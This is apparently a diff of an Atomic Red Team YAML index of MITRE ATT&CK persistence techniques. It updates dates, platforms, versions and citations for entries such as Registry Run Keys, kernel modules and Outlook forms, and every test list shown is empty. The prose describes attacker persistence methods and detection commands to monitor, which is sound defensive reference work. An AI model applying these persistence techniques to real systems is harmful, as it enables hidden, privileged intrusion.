       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -32730,11 +33159,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -32821,9 +33249,9 @@ persistence:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -32836,12 +33264,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1136.003:
     technique:
-      modified: '2024-03-28T16:14:28.678Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Create Account: Cloud Account'
       description: |-
         Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -32854,9 +33281,11 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Praetorian
       - Microsoft Threat Intelligence Center (MSTIC)
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Collect usage logs from cloud user and administrator accounts
         to identify unusual activity in the creation of new accounts and assignment
@@ -32865,13 +33294,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Creation'
       type: attack-pattern
@@ -32919,14 +33348,11 @@ persistence:
         url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.003
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -32962,16 +33388,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -33012,143 +33437,141 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests: []
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -33185,7 +33608,7 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -33211,12 +33634,10 @@ persistence:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -33294,9 +33715,8 @@ persistence:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1542.004:
@@ -33323,7 +33743,7 @@ persistence:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -33345,41 +33765,10 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
-      type: attack-pattern
-      created: '2019-11-07T20:06:02.624Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.003
-        url: https://attack.mitre.org/techniques/T1137/003
-      - source_name: SensePost Outlook Forms
-        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
-        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
-          February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:00.782Z'
       name: Outlook Forms
       description: |-
         Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -33388,22 +33777,49 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+      created: '2019-11-07T20:06:02.624Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/003
+        external_id: T1137.003
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Forms
+        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+          February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574:
     technique:
@@ -33469,7 +33885,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -33543,11 +33958,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -33564,7 +33978,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -33574,7 +33987,7 @@ persistence:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -33583,19 +33996,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
